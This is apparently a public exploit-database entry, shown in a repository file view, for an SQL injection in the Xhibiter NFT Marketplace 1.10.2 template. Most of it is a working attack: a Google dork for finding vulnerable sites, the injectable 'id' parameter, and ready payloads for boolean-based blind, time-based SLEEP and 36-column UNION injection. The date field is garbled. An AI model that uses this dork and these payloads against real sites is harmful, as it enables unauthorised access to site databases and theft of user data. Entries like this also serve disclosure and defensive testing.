ec14967376
5 changes to exploits/shellcodes/ghdb Azon Dominator Affiliate Marketing Script - SQL Injection Customer Support System 1.0 - Stored XSS Microweber 2.0.15 - Stored XSS Xhibiter NFT Marketplace 1.10.2 - SQL Injection
27 lines
No EOL
1.2 KiB
Text
27 lines
No EOL
1.2 KiB
Text
# Exploit Title: xhibiter nft marketplace SQLI
|
|
# Google Dork: intitle:"View - Browse, create, buy, sell, and auction NFTs"
|
|
# Date: 29/06/204
|
|
# Exploit Author: Sohel yousef - https://www.linkedin.com/in/sohel-yousef-50a905189/
|
|
# Vendor Homepage: https://elements.envato.com/xhibiter-nft-marketplace-html-template-AQN45FA
|
|
# Version: 1.10.2
|
|
# Tested on: linux
|
|
# CVE : [if applicable]
|
|
|
|
on this dir
|
|
https://localhost/collections?id=2
|
|
xhibiter nft marketplace suffers from SQLI
|
|
|
|
---
|
|
Parameter: id (GET)
|
|
Type: boolean-based blind
|
|
Title: AND boolean-based blind - WHERE or HAVING clause
|
|
Payload: id=2' AND 4182=4182 AND 'rNfD'='rNfD
|
|
|
|
Type: time-based blind
|
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
|
Payload: id=2' AND (SELECT 1492 FROM (SELECT(SLEEP(5)))HsLV) AND 'KEOa'='KEOa
|
|
|
|
Type: UNION query
|
|
Title: MySQL UNION query (NULL) - 36 columns
|
|
Payload: id=2' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162626271,0x655465754c50524d684f764944434458624e4e596c614b6d4a56656f495669466d4b704362666b58,0x71716a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
|
|
--- |